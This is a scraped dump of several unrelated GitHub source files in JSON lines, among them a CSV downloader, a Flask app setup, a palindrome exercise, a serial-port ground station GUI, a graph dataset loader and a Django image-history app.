print(\"Please provide valid molecule.\\n\")\n\ntableau = parseMolecule(molecule)\n\nprint(tableau)\n\ndrawMolecule(tableau)\n","repo_name":"cmoll24/IUPAC-Chemistry-Renderer","sub_path":"OrganicChemistry.py","file_name":"OrganicChemistry.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15029480207","text":"\"\"\"\nThis script will extract files from pages provided\n\"\"\"\n\n# Standar library imports\nimport os\nimport pandas as pd\nimport requests\nimport datetime\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\nfrom decouple import config\n\n# Local applications\nfrom loggings import set_up_loggin\n\n# Set up logger\nlogger = set_up_loggin(config(\"FILE_LOGGER_NAME\"))\n\n\ndef find_url_csv(url: str):\n \"\"\"\n This function receive the url\n where csv files will be downloaded.\n \n @param: url of the page where is located the csv file\n \"\"\"\n try: \n response = requests.get(url)\n if response.ok:\n logger.info(\"Connection status to the current page: Ok\")\n else:\n logger.error(\"Connection status to the current page: Fail\") \n except HTTPError as http_error: \n logger.critical(f\"{http_error}\")\n except Exception as ex:\n logger.error(f\"{ex}\") \n \n soup = BeautifulSoup(response.text, features=\"html.parser\")\n tag = soup.find(\"a\", class_=\"btn btn-green btn-block\")\n \n \n return tag.attrs[\"href\"] \n \n \ndef download_csv(category, url):\n \"\"\"\n This function takes the csv's url\n and prepare the file to be downloaded\n \n @param: category of the file will be downloaded\n \n @param: url of the csv file\n \"\"\" \n # Dates \n year = datetime.datetime.now().year\n month = datetime.datetime.now()\n day = datetime.datetime.now().day\n \n # Building path\n path = f\"{category}\" \n if not os.path.exists(path):\n os.mkdir(path)\n \n path = os.path.join(path, f\"{year}-{month.strftime('%B')}\")\n if not os.path.exists(path):\n os.mkdir(path) \n \n try: \n response = requests.get(url)\n if response.ok:\n with open(\n os.path.join(path, f\"{category}-{day}-{month.month}-{year}\"), \n \"wb\"\n ) as f:\n f.write(response.content) \n \n logger.info(f\"{category} information download status: Success\") \n else:\n logger.error(f\"{category} information download status: Fail\") \n except HTTPError as http_error: \n logger.critical(f\"{http_error}\")\n except Exception as ex:\n logger.error(f\"{ex}\") \n \n # Setting categories\n \n \ndef main_download_source_files(): \n \"\"\"\n This function execute the functions\n created above.\n \"\"\"\n logger.info(\"The execution of download_source_files.py started\")\n\n categories = [\"MUSEOS\", \"BIBLIOTECAS\", \"CINES\"] \n for i in categories:\n url = find_url_csv(config(i))\n download_csv(i.lower(), url) \n \n logger.info(\"The execution of download_source_files.py finished\")\n\nif __name__ == '__main__':\n main_download_source_files()\n ","repo_name":"gioleon/challenge-alkemy","sub_path":"download_source_files.py","file_name":"download_source_files.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22516793928","text":"import os\nimport yaml\nfrom flask import Flask as BaseFlask, Config as BaseConfig\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\n\nclass Config(BaseConfig):\n\n def from_yaml(self, config_file):\n env = os.environ.get('FLASK_ENV', 'development')\n self['ENVIRONMENT'] = env.lower()\n\n with open(config_file) as f:\n c = yaml.load(f, yaml.Loader)\n\n c = c.get(env, c)\n for key in c.keys():\n if key.isupper():\n self[key] = c[key]\n\n\nclass Flask(BaseFlask):\n\n def make_config(self, instance_relative=False):\n root_path = self.root_path\n if instance_relative:\n root_path = self.instance_path\n return Config(root_path, self.default_config)\n\n\ndef register_blueprints(app: Flask):\n from .handler import user\n from .handler import node\n app.register_blueprint(user.user_bp)\n app.register_blueprint(node.node_bp)\n\n\ndef create_app():\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_yaml(os.path.join(app.root_path, 'config.yml'))\n register_blueprints(app)\n db.init_app(app)\n ma.init_app(app)\n with app.app_context():\n db.create_all()\n a = db.session.execute(\n \"SELECT COUNT(1) indexExists FROM INFORMATION_SCHEMA.STATISTICS \"\n \"WHERE table_schema=DATABASE() AND table_name='node' AND index_name='idx_node_ftxt';\")\n if a.columns('indexExists').first()[0] == 0:\n db.session.execute(\"CREATE FULLTEXT INDEX idx_node_ftxt on node (detail)\")\n return app\n","repo_name":"flametest/flask-server-example","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13926023220","text":"#가로축순회 하고 회문 못찾으면 세로축순회\n#가로축 처음인덱스와 끝인덱스 비교비교비교\n\nT = int(input())\nfor tc in range(1, T+1):\n n, m = map(int,input().split())\n arr = [input() for _ in range(n)]\n result = 0\n newnewarr=[]\n # 가로축에서 회문 찾기\n for i in range(n): # 0 1 2 3 4 5 6 7 8 9\n for j in range(n-m+1): # 0 1 2 3 4\n if arr[i][j:j+m] == arr[i][j:j+m][::-1]:\n result = ''.join(arr[i][j:j+m])\n\n # 세로축에서 회문 찾기\n # 세로축은 슬라이싱 안되니까 행 열 자리 바꿔주자\n for i in range(n):\n newarr = []\n for j in range(n):\n newarr += arr[j][i]\n newnewarr.append(''.join(newarr))\n\n for i in range(n): # 0 1 2 3 4 5 6 7 8 9\n for j in range(n-m+1): # 0 1 2 3 4\n if newnewarr[i][j:j+m] == newnewarr[i][j:j+m][::-1]:\n result = ''.join(newnewarr[i][j:j+m])\n\n print(f'#{tc} {result}')\n\n\n\n","repo_name":"seongbiny/algorithm","sub_path":"SWEA/4861.py","file_name":"4861.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"522396199","text":"import torch\r\nfrom facenet_pytorch import MTCNN\r\nfrom src.Utils.ConfigProvider import ConfigProvider\r\nimport numpy as np\r\nimport cv2\r\nfrom src.post_processing.PostProcessor import PostProcessor\r\nfrom src.statefull_processing.BboxTracker import BboxTracker\r\n\r\n\r\nclass StatefulFrameProcessor(object):\r\n def __init__(self):\r\n self._config = ConfigProvider.config()\r\n self._device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n print(f'Running on device: {self._device}')\r\n self._mtcnn = MTCNN(keep_all=True, device=self._device)\r\n self._bbox_tracker = BboxTracker()\r\n\r\n # self._last_frame_filtered_bboxes, self._last_frame_confidences = None, None\r\n\r\n def process_single_frame(self, frame, frame_index):\r\n detected_bboxes, confidences = self._mtcnn.detect(frame)\r\n detected_bboxes = [] if detected_bboxes is None else detected_bboxes\r\n confidences = [] if confidences is None else confidences\r\n\r\n confident_bboxes = np.array([bbox for bbox, confidence in zip(detected_bboxes, confidences) if\r\n self._config.detection.confidence_threshold < confidence])\r\n tracked_bboxes = self._bbox_tracker.update_tracked_bboxes(\r\n frame_index=frame_index,\r\n new_bboxes=confident_bboxes)\r\n\r\n frame = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)\r\n if 0 < len(tracked_bboxes.shape):\r\n frame = PostProcessor.draw_rectengles(frame, tracked_bboxes)\r\n frame = PostProcessor.blur_at_bboxes(frame, tracked_bboxes)\r\n return frame\r\n","repo_name":"noamzilo/face_pose_estimation","sub_path":"statefull_processing/StatefulFrameProcessor.py","file_name":"StatefulFrameProcessor.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8024989114","text":"import gc\n\nfrom pandas import Categorical\n\nfrom .evaluation.analysis import normalize_scores\n\n\ndef rank_by_func(scores):\n scores['rank'] = scores.groupby('func').score.rank(ascending=False, method='first')\n return scores\n\n\ndef add_helper_columns(scores):\n scores['is_indication'] = scores.group == 'indications'\n scores['is_indication'] = Categorical(scores.is_indication)\n scores['known_indication'] = scores['is_indication'].cat.rename_categories({\n True: 'known indications',\n False: 'non-indications'\n })\n return scores\n\n\ndef rename_and_order_func(scores, nice_function_names):\n scores.func = scores.func.cat.rename_categories(nice_function_names)\n scores.func = Categorical(scores.func, ordered=True, categories=[\n name\n for name in nice_function_names.values()\n if name in scores.func.unique()\n ])\n return scores\n\n\ndef categorize_values(scores):\n categorical_columns = ['pert_iname', 'group', 'pert_idose', 'func', 'cell_id']\n for categorical in categorical_columns:\n if categorical in scores.columns:\n scores[categorical] = Categorical(scores[categorical])\n gc.collect()\n return scores\n\n\ndef process_scores(scores, names_map):\n scores = categorize_values(scores)\n scores = normalize_scores(scores, rescale=True, by_cell=False)\n scores = rename_and_order_func(scores, names_map)\n scores = add_helper_columns(scores)\n scores = rank_by_func(scores)\n return scores\n","repo_name":"krassowski/drug-disease-profile-matching","sub_path":"signature_scoring/post_processing.py","file_name":"post_processing.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"22243376859","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom PIL import Image\nfrom PIL import ImageTk\nimport serial as sr\nimport numpy as np\nimport pandas as pd\nimport csv\nimport serial.tools.list_ports\n\n################################################### SERIAL DATA FUNCTIONS ########################################################\n# a = {\\\n# \"pkt\":15,\"drp\":101,\"alt\":65,\"temp\":84.59,\"lat\":49.854826,\n# \"lon\":72.958413,\"hdng\":20.54,\"spd\":10.96,\"aclx\":2.12,\"acly\":6.54,\n# \"aclz\":1.25,\"gyrox\":1.26,\"gyroy\":1.48,\"gyroz\":2.08,\"magx\":1.85,\n# \"magy\":8.95,\"magz\":4.85,\"habDrp\":68.95,\"cdaDrp\":23.39,\"watDrp\":102.65,\"rssi\":-40\n# } # Dummy Data\n# df = pd.DataFrame.from_dict(data = a, orient = 'index').T\ncond = False\ndf = pd.DataFrame()\n\n\ndef get_data():\n global cond, s, df # , a, df\n cda_check_drop = 0\n wh_check_drop = 0\n if (cond == True):\n serialString = s.readline().rstrip().decode(\"utf-8\") # Read data in serial buffer\n try:\n serialDict = eval(serialString) # Try to convert the raw string into a dictionary\n # serialDict = a\n except (NameError, SyntaxError, ValueError) as e: # catch any errors when trying to convert to dictionary\n pass\n else:\n print(serialDict)\n df = df.append(serialDict, ignore_index=True)\n\n altitude = format(serialDict['alt'],\".2f\")\n str_alt.set(altitude)\n\n speed = serialDict['spd']\n str_spd = tk.StringVar()\n str_spd.set(speed)\n speed_num = tk.Label(alt_frame, textvariable=str_spd, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n speed_num.grid(row=1, column=6, sticky=\"ns\")\n\n if float(serialDict['habHeight']) != 0 and wh_check_drop == 0:\n wh_alt = serialDict['habHeight']\n wh_cda_alt = tk.StringVar()\n wh_cda_alt.set(wh_alt)\n\n wh_num = tk.Label(alt_frame, textvariable=wh_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n wh_num.grid(row=1, column=4, sticky=\"ns\")\n wh_check_drop = 1\n\n if float(serialDict['cdaHeight']) != 0 and cda_check_drop == 0:\n cda_alt = serialDict['cdaHeight']\n str_cda_alt = tk.StringVar()\n str_cda_alt.set(cda_alt)\n\n cda_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n cda_num.grid(row=1, column=2, sticky=\"ns\")\n cda_check_drop = 1\n\n root.update_idletasks()\n root.after(100, get_data)\n\n\ndef data_stop():\n global cond, df, second_frame\n #cond = False\n for col_num, col_name in enumerate(df.columns):\n label = tk.Label(second_frame, width=6, height=1,\n text=col_name, relief=tk.RIDGE)\n label.grid(row=1, column=col_num)\n for i in range(len(df)):\n for j in range(len(df.iloc[0, :])):\n element = round(df.iloc[i, j], 2)\n label = tk.Label(second_frame, width=6, height=1,\n text=element, relief=tk.RIDGE)\n label.grid(row=i + 2, column=j)\n\n\n######################################################## COM PORT INPUT GUI ####################################################\n# function to return port # input\ndef format_port(port_number):\n com_port_str = 'COM' + str(port_number)\n return (com_port_str)\n\n\ndef get_port(entry):\n print('Port selected: ', entry)\n global comport_root\n comport_root.destroy()\n\n global cond\n cond = True\n # s.reset_input_buffer()\n\n global com_port\n com_port = format_port(entry)\n return com_port\n\n\n# comport GUI\ncomport_root = tk.Tk()\ncomport_root.title('Please enter your COM port')\ncomport_root.geometry('380x80')\n\n# entry box\nentry = tk.Entry(comport_root)\nentry.grid(row=1, column=0)\n\n# label of available COM ports\ncomList = serial.tools.list_ports.comports()\n# Get list of available COM ports\nconnected = ''\nfor element in comList:\n connected += (str(element.device) + ' ')\nlabel = tk.Label(comport_root, \\\n text='Available COM Ports:\\n' + connected,\n bg='white')\nlabel.grid(row=0, column=0)\n\n# enter button\nbutton = tk.Button(comport_root, \\\n text='Enter',\n bg='white',\n command=lambda: get_port(entry.get()))\nbutton.grid(row=1, column=1)\n\ncomport_root.mainloop()\n\n#################################################### BUILDING THE MAIN GUI ########################################################\n# creating the master window (root)\nroot = tk.Tk()\nroot.title('Ground Station GUI')\n# creating tab control\ntabcontrol = ttk.Notebook(root, \\\n height=1000,\n width=1800)\n\n# adding tabs\ndashboard = ttk.Frame(tabcontrol)\nall_data = ttk.Frame(tabcontrol)\ntabcontrol.add(dashboard, text='Dashboard')\ntabcontrol.add(all_data, text='All DAS Data')\ntabcontrol.pack(expand=1, fill='both')\n\n# ------------------------------------------------------- DASHBOARD TAB ---------------------------------------------------------------\n# CURRENT/PAYLOAD ALTITUDES AND SPEED\nalt_frame = tk.Frame(dashboard)\nalt_frame.place(relheigh=0.165, relwidth=0.70)\n\n# live altitude\n# altitude = 0.00\n# str_alt = tk.StringVar()\n# str_alt.set(altitude)\n\nalt_label = tk.Label(alt_frame, text=\"Current Altitude (ft):\", font=(\"Fixedsys\", 24), fg='black')\nalt_label.grid(sticky=\"nesw\")\n\nstr_alt = tk.StringVar()\nstr_alt.set(\"\")\nalt_num = tk.Label(alt_frame, textvariable=str_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\nalt_num.grid(row=1, column=0, sticky=\"ns\")\n# alt_num = tk.Label(alt_frame, textvariable=str_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# alt_num.grid(row = 1, sticky=\"ns\")\n\n# CDA altitude\n# cda_alt = 0.00\n# str_cda_alt = tk.StringVar()\n# str_cda_alt.set(cda_alt)\n\ncda_label = tk.Label(alt_frame, text=\"Colonist drop (ft):\", font=(\"Fixedsys\", 24), fg='black')\ncda_label.grid(row=0, column=2, sticky=\"nesw\", padx=15)\n\n# cda_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# cda_num.grid(row=1, column = 2, sticky=\"ns\")\n\n# Water/habitat altitude\n# wh_alt = 0.00\n# str_wh_alt = tk.StringVar()\n# str_wh_alt.set(wh_alt)\n\nwh_label = tk.Label(alt_frame, text=\"Water/habitat drop (ft):\", font=(\"Fixedsys\", 24), fg='black')\nwh_label.grid(row=0, column=4, sticky=\"nesw\", padx=12)\n\n# wh_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# wh_num.grid(row=1, column = 4, sticky=\"ns\")\n\n# Speed\n# speed = 0.00\n# str_speed = tk.StringVar()\n# str_speed.set(speed)\n\nspeed_label = tk.Label(alt_frame, text=\"Speed (mph):\", font=(\"Fixedsys\", 24), fg='black')\nspeed_label.grid(row=0, column=6, sticky=\"nesw\", padx=15)\n\n# speed_num = tk.Label(alt_frame, textvariable=str_cda_alt, font=(\"Fixedsys\", 48), bd=5, relief=\"sunken\")\n# speed_num.grid(row=1, column = 6, sticky=\"ns\")\n\n# # GPS\n# img = Image.open(\"formatted_airfield_test.jpeg\")\n# img = img.resize((400,480),Image.ANTIALIAS)\n# gps_img = ImageTk.PhotoImage(img)\n# gps_display = tk.Label(dashboard, image = gps_img)\n# gps_display.place(x=1000, y=250)\n\n# ----------------------------------------------------- DATA PLAYBACK TAB ---------------------------------------------------------------\nBOTH = 'both'\nLEFT = 'left'\nRIGHT = 'right'\nVERTICAL = 'vertical'\nY = 'y'\nstyle = ttk.Style()\nstyle.configure(\"Vertical.TScrollbar\", gripcount=0,\n background=\"Green\", darkcolor=\"DarkGreen\", lightcolor=\"LightGreen\",\n troughcolor=\"gray\", bordercolor=\"blue\", arrowcolor=\"white\")\n# making a main frame\nmain_frame = tk.Frame(all_data)\nmain_frame.pack(fill=BOTH, expand=1)\n# making a canvas\ndata_canvas = tk.Canvas(main_frame)\ndata_canvas.pack(side=LEFT, fill=BOTH, expand=1)\n# making a scrollbar\nscrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=data_canvas.yview, style=\"Vertical.TScrollbar\")\nscrollbar.pack(side=RIGHT, fill=Y)\n# configure the canvas\ndata_canvas.configure(yscrollcommand=scrollbar.set)\ndata_canvas.bind('', lambda e: data_canvas.configure(scrollregion=data_canvas.bbox('all')))\n# making a second frame for the data\nsecond_frame = tk.Frame(data_canvas)\n# adding that^ frame to a window to be placed in the canvas\ndata_canvas.create_window((0, 300), window=second_frame, anchor='nw')\n\n# adding a display data button\nshow_data_button = tk.Button(all_data, \\\n text='Click for data', command=lambda: data_stop())\nshow_data_button.place(anchor='nw')\n\ns = sr.Serial('COM4', 9600) # change COM Port name\ns.reset_input_buffer()\nroot.after(5, get_data)\nroot.mainloop()\n","repo_name":"FirkinTage/UDASAE_Controls","sub_path":"ControlsGUI/GUI-Draft-3.py","file_name":"GUI-Draft-3.py","file_ext":"py","file_size_in_byte":8694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34900674207","text":"import warnings\nfrom typing import List\n\nimport torch\nfrom torch.utils.data import random_split\nfrom torch_geometric.loader import DataLoader\nfrom torch_geometric.transforms import Compose\n\nfrom matdeeplearn.common.registry import registry\nfrom matdeeplearn.preprocessor.datasets import LargeStructureDataset, StructureDataset\n\n\n# train test split\ndef dataset_split(\n dataset,\n train_size: float = 0.8,\n valid_size: float = 0.05,\n test_size: float = 0.15,\n):\n \"\"\"\n Splits an input dataset into 3 subsets: train, validation, test.\n Requires train_size + valid_size + test_size = 1\n\n Parameters\n ----------\n dataset: matdeeplearn.preprocessor.datasets.StructureDataset\n a dataset object that contains the target data\n\n train_size: float\n a float between 0.0 and 1.0 that represents the proportion\n of the dataset to use as the training set\n\n valid_size: float\n a float between 0.0 and 1.0 that represents the proportion\n of the dataset to use as the validation set\n\n test_size: float\n a float between 0.0 and 1.0 that represents the proportion\n of the dataset to use as the test set\n \"\"\"\n \n if train_size + valid_size + test_size > 1:\n warnings.warn(\"Invalid sizes detected (ratios add up to larger than one). Using default split of 0.8/0.05/0.15.\")\n train_size, valid_size, test_size = 0.8, 0.05, 0.15\n\n dataset_size = len(dataset)\n\n train_len = int(train_size * dataset_size)\n valid_len = int(valid_size * dataset_size)\n test_len = int(test_size * dataset_size)\n unused_len = dataset_size - train_len - valid_len - test_len\n\n (train_dataset, val_dataset, test_dataset, unused_dataset) = random_split(\n dataset,\n [train_len, valid_len, test_len, unused_len],\n )\n\n return train_dataset, val_dataset, test_dataset\n\ndef get_otf_transforms(transform_list: List[dict]):\n \"\"\"\n get on the fly specific transforms\n\n Parameters\n ----------\n\n transform_list: transformation function/classes to be applied\n \"\"\"\n\n transforms = []\n # set transform method\n for transform in transform_list:\n if transform.get(\"otf_transform\", False):\n transforms.append(\n registry.get_transform_class(\n transform[\"name\"],\n **transform.get(\"args\", {})\n )\n )\n \n return transforms\n\ndef get_dataset(\n data_path,\n processed_file_name,\n transform_list: List[dict] = [],\n large_dataset=False,\n dataset_device=None,\n):\n \"\"\"\n get dataset according to data_path\n this assumes that the data has already been processed and\n data.pt file exists in data_path/processed/ folder\n\n Parameters\n ----------\n\n data_path: str\n path to the folder containing data.pt file\n\n transform_list: transformation function/classes to be applied\n \"\"\"\n\n # get on the fly transforms for use on dataset access\n otf_transforms = get_otf_transforms(transform_list)\n\n # check if large dataset is needed\n if large_dataset:\n Dataset = LargeStructureDataset\n else:\n Dataset = StructureDataset\n\n composition = Compose(otf_transforms) if len(otf_transforms) >= 1 else None\n \n dataset = Dataset(data_path, processed_data_path=\"\", processed_file_name=processed_file_name, transform=composition, device=dataset_device)\n\n return dataset\n\n\ndef get_dataloader(\n dataset, batch_size: int, num_workers: int = 8, sampler=None, shuffle=True\n):\n \"\"\"\n Returns a single dataloader for a given dataset\n\n Parameters\n ----------\n dataset: matdeeplearn.preprocessor.datasets.StructureDataset\n a dataset object that contains the target data\n\n batch_size: int\n size of each batch\n\n num_workers: int\n how many subprocesses to use for data loading. 0 means that\n the data will be loaded in the main process.\n \"\"\"\n\n # load data\n try: \n device = str(dataset.dataset[0].pos.device)\n except:\n device = str(dataset[0].pos.device)\n \n if device == \"cuda:0\" or device == \"cuda\":\n loader = DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=(sampler is None),\n num_workers=0,\n pin_memory=False,\n sampler=sampler,\n )\n else:\n loader = DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=(sampler is None),\n num_workers=num_workers,\n pin_memory=True,\n sampler=sampler,\n )\n return loader\n","repo_name":"Fung-Lab/MatDeepLearn_dev","sub_path":"matdeeplearn/common/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"14765376008","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.http.response import StreamingHttpResponse\nfrom django.contrib.auth.hashers import make_password, check_password\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage, InvalidPage\nimport sqlite3\nimport json\nimport random\nimport time\nimport datetime\nimport pytz\nimport os\nfrom math import *\nfrom . import rules\n\n\ndef switch_time(time_stamp):\n '''\n\t\t功能:时间戳转化为北京时间\n 输入:int类型,时间戳(毫秒级)\n 输出:str类型,对应的北京时间\n\t'''\n mili_second = time_stamp % 1000\n new_time_stamp = floor(time_stamp / 1000)\n time_array = time.localtime(new_time_stamp) \n time_real = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_array)\n time_real += '.'\n time_real += str(mili_second).rjust(3,'0') \n #print(time_real)\n return time_real\n\n\ndef getCurTime():\n '''\n \t功能:获取当前毫秒时间戳\n 输出:int类型,时间戳(毫秒级)\n '''\n curtime = int(time.time() * 1000)\n return curtime\n\n\ndef show_index(request): \n '''\n \t功能:处理/index(主页)访问请求\n '''\n\n context = {}\n username = rules.judge_whether_loaded(request)\n if(username == None):\n #未登录,报错\n response = HttpResponseRedirect('/error') \n return response\n else:\n context['username'] = username\n return render(request, 'index.html', context)\n\ndef show_error(request):\n '''\n \t功能:处理/error(错误)访问请求,如果未登录访问主页,历史记录,删除等会让你返回登录,已登录访问登录,注册会让你返回主页\n '''\n context = {}\n username = rules.judge_whether_loaded(request)\n if(username != None):\n #已经登录,报错\n context['logged'] = True\n else:\n #未登录\n context['logged'] = False\n return render(request, 'error.html', context)\n\n\ndef show_logout(request):\n '''\n \t功能:处理/logout(注销)访问请求\n '''\n rules.logout(request)\n response = HttpResponseRedirect('/login')\n #response.set_cookie('session_id', None)\n return response\n\ndef show_logon(request):\n '''\n \t功能:处理/logon(注册)访问请求\n 如果注册成功,返回用户名\n 注册失败,返回失败错误码\n '''\n context = {}\n show_data = {}\n username = rules.judge_whether_loaded(request)\n if(username != None):\n #已经登录,报错\n response = HttpResponseRedirect('/error') \n return response\n if request.method == 'POST':\n show_data = rules.logon(request)\n if \"error\" in show_data.keys():\n context[\"message\"] = show_data[\"error\"]\n context[\"result\"] = \"error\"\n else:\n context[\"result\"] = \"注册成功!\"\n context[\"message\"] = \"用户名为\" + str(show_data[\"user\"]) \n return render(request, 'logon.html', context)\n\ndef show_login(request):\n '''\n \t功能:处理/login(登录)访问请求\n 如果登录成功,重定向主页\n 登陆失败,返回错误码\n '''\n context = {}\n show_data = {}\n username = rules.judge_whether_loaded(request)\n if(username != None):\n #已经登录,报错\n response = HttpResponseRedirect('/error') \n return response\n if request.method == 'POST':\n show_data = rules.login(request)\n if \"error\" in show_data.keys():\n context[\"message\"] = show_data[\"error\"]\n context[\"result\"] = \"error\" \n return render(request, 'login.html', context)\n else:\n response = HttpResponseRedirect('/index') \n response.set_cookie('session_id', show_data[\"session\"])\n return response\n else:\n return render(request, 'login.html', context)\n\n \ndef show_service(request):\n '''\n \t功能:处理主页的查看图片功能\n 将后端返回的base64图片转化为可以在前端img显示的src,然后返回\n '''\n response_content = rules.service(request)\n response_content[\"original\"] = \"data:image/jpeg;base64,\" + response_content[\"original\"][ : ]\n response_content[\"result\"] = \"data:image/jpeg;base64,\" + response_content[\"result\"][ : ]\n #print(response_content)\n return JsonResponse(response_content)\n\n#x是历史记录,用于排序\ndef f(x):\n return int(x[\"time\"])\n\ndef show_history(request):\n '''\n \t功能:处理/history/的url,显示历史记录\n 查找并显示全部/按时间查找的历史记录,并且分页显示\n '''\n context = {}\n username = rules.judge_whether_loaded(request)\n if(username == None):\n #未登录,报错\n response = HttpResponseRedirect('/error') \n return response\n else:\n context['username'] = username\n if request.method == \"GET\":\n #将前端输入的时间转化为时间戳传给后端,如果没输入时间,传None\n try:\n start_date = str(request.GET.get(\"start_date\"))\n end_date = str(request.GET.get(\"end_date\"))\n start_time = start_date[ : ] + \" 00:00:00\"\n end_time = end_date[ : ] + \" 23:59:59\"\n start = time.mktime(time.strptime(start_time, '%Y-%m-%d %H:%M:%S')) * 1000\n end = time.mktime(time.strptime(end_time, '%Y-%m-%d %H:%M:%S')) * 1000\n assert start and end\n except:\n start = None\n end = None\n #查询全部记录,按照时间降序排序\n get_list = rules.query_date(request, start, end)\n for item in get_list[\"list\"]:\n item[\"time\"] = int(item[\"time\"])\n get_list[\"list\"].sort(key = f, reverse = True)\n record_list = []\n #将返回数据处理成前端显示的数据\n for item in get_list[\"list\"]:\n new_dict = {}\n new_dict[\"username\"] = item[\"username\"]\n new_dict[\"name\"] = item[\"name\"]\n new_dict[\"id\"] = str(item[\"record_id\"])\n if item[\"content\"] == \"No URL.\":\n new_dict[\"type\"] = \"本地图片\"\n else:\n new_dict[\"type\"] = \"网络下载\"\n new_dict[\"time\"] = switch_time(int(item[\"time\"]))\n record_list.append(new_dict)\n #分页显示\n #将数据按照规定每页显示10条, 进行分割\n paginator = Paginator(record_list, 10)\n # 获取 url 后面的 page 参数的值, 首页不显示 page 参数, 默认值是 1 \n try:\n page = request.GET.get('page')\n records = paginator.page(page)\n except:\n #如果请求的页数不合法,返回第一页\n records = paginator.page(1)\n context['records'] = records\n return render(request, \"history.html\", context)\n\ndef show_details(request):\n '''\n \t功能:处理/detail/的url,显示单个历史记录\n 获取单个历史记录的数据和图片,并且显示\n '''\n username = rules.judge_whether_loaded(request)\n if(username == None):\n #未登录,报错\n response = HttpResponseRedirect('/error') \n return response\n record = rules.get(request)\n if \"error\" in record.keys():\n #未找到此记录,报错\n response = HttpResponseRedirect('/not_found') \n return response\n #将返回的内容处理成前端显示的内容\n context = {}\n context[\"username\"] = record[\"username\"]\n context[\"id\"] = record[\"record_id\"]\n context[\"name\"] = record[\"name\"]\n context[\"time\"] = switch_time(int(record[\"time\"]))\n if record[\"content\"] == \"No URL.\":\n context[\"type\"] = \"本地图片\"\n else:\n context[\"type\"] = \"网络下载\"\n context[\"original\"] = \"data:image/jpeg;base64,\" + record[\"base64_image\"]\n context[\"result\"] = \"data:image/jpeg;base64,\" + record[\"base64_result\"]\n return render(request, \"detail.html\", context)\n\ndef show_delete(request):\n '''\n \t功能:处理/delete/的url,删除单个历史记录\n '''\n username = rules.judge_whether_loaded(request)\n if(username == None):\n #未登录,报错\n response = HttpResponseRedirect('/error') \n return response\n record = rules.delete(request)\n if \"error\" in record.keys():\n #未找到此记录,报错\n response = HttpResponseRedirect('/not_found') \n return response\n response = HttpResponseRedirect('/history/') \n return response\n\ndef show_not_found(request):\n '''\n \t功能:处理/not_found访问请求,如果历史记录不存在/没权限访问/历史记录不合法,比如图片损坏,格式不符,无法下载,无法打开等,显示这个\n '''\n context={}\n return render(request, \"not_found.html\", context)\n \ndef delete_many(request):\n '''\n \t功能:删除按时间选中的多个历史记录\n '''\n context = {}\n username = rules.judge_whether_loaded(request)\n if(username == None):\n #未登录,报错\n response = HttpResponseRedirect('/error') \n return response\n else:\n context['username'] = username\n #将输入时间转化为时间戳\n try:\n start_date = str(request.POST.get(\"start_date\"))\n end_date = str(request.POST.get(\"end_date\"))\n start_time = start_date[ : ] + \" 00:00:00\"\n end_time = end_date[ : ] + \" 23:59:59\"\n start = time.mktime(time.strptime(start_time, '%Y-%m-%d %H:%M:%S')) * 1000\n end = time.mktime(time.strptime(end_time, '%Y-%m-%d %H:%M:%S')) * 1000\n assert start and end\n except:\n start = None\n end = None\n #查询得到所有数据\n get_list = rules.query_date(request, start, end)\n delete_list = []\n #挨个删除数据库数据和文件\n for item in get_list[\"list\"]:\n rules.delete_record(item[\"username\"], int(item[\"record_id\"]))\n try:\n os.remove(os.path.join(\"database\", item[\"username\"], str(item[\"record_id\"]) + \".jpeg\"))\n os.remove(os.path.join(\"database\", item[\"username\"], str(item[\"record_id\"]) + \"_result.jpeg\"))\n except:\n pass\n return render(request, \"history.html\", context)\n","repo_name":"SerCharles/Picture-Manager","sub_path":"hw4/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10108289209","text":"import collections\n\n\nclass Solution:\n def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:\n\n banned = set(banned)\n 